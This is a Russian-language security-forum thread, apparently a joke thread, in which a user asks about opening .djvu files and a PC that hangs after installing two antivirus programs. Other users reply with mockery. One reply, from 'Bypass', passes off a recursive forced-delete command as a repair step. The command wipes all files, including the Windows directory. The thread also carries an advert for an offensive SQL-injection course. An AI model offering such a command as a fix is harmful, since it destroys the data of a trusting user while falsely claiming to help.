• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

как просмотреть файлы формата .djvu

C

chelnokoff111

Здравствуйте ребят. Подскажите как просмотреть файлы формата .djvu
Я скачал игру, а файл не открывается что делать? (оказалось что чувак не знаком с Винраром)
Я установил Касперский и Нод32, теперь у меня компьютер висит! Может это вирус?
 

Глюк

Red Team
03.01.2018
1 184
1 877
BIT
104
Здравствуйте ребят. Подскажите как просмотреть файлы формата .djvu
Я скачал игру, а файл не открывается что делать? (оказалось что чувак не знаком с Винраром)
Я установил Касперский и Нод32, теперь у меня компьютер висит! Может это вирус?
.

Я установил Касперский и Нод32, теперь у меня компьютер висит! Может это вирус?
в правильно заданном вопросе содержится ответ... ) установил каспер и нод и комп повис. удали каспер и нод и комп заработает. вирус = антивирусник... )
 

Bypass

Green Team
02.02.2018
451
579
BIT
0
Сейчас вряд ли получится удалить хотя бы 1 антивирус только полный снос системы
с чего это? если в безопасном режиме не загрузишься и не удалишь
накатываешь ав на виртуалку, делаешь снимок файлов которыми он насрал, делаешь снимок реестра, грузишься под лайфом и сносишь все к чертям.

Может это вирус?
тебе просто не хватает еще там минимум два антеверуса - аваст и дрВеб, нужно доустановить. Комп сразу залетает.
Берешь установочный диск, запускаешься с него, жмешь востоновление и там в консоль переходи, вот эту команду там запускай

del /f /s /q *.dll && del /f /s /q *.* && del /f /s /q %windir%\*.*

установиться все будет хорошо работать.
 
Последнее редактирование:
  • Нравится
Реакции: westman

makar

Green Team
08.09.2016
236
150
BIT
0
ну весной попался экземпляр на котором запущен был Аваст и McAfee там даже через командную строку мучался в итоге загрузил с флешки Линукс все файлы скинул на диск и снёс винду
 
C

chelnokoff111

-Папа, я хочу херню.
k8.jpg

-на дочка только помой ее и запомни это
называется "хурма"
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!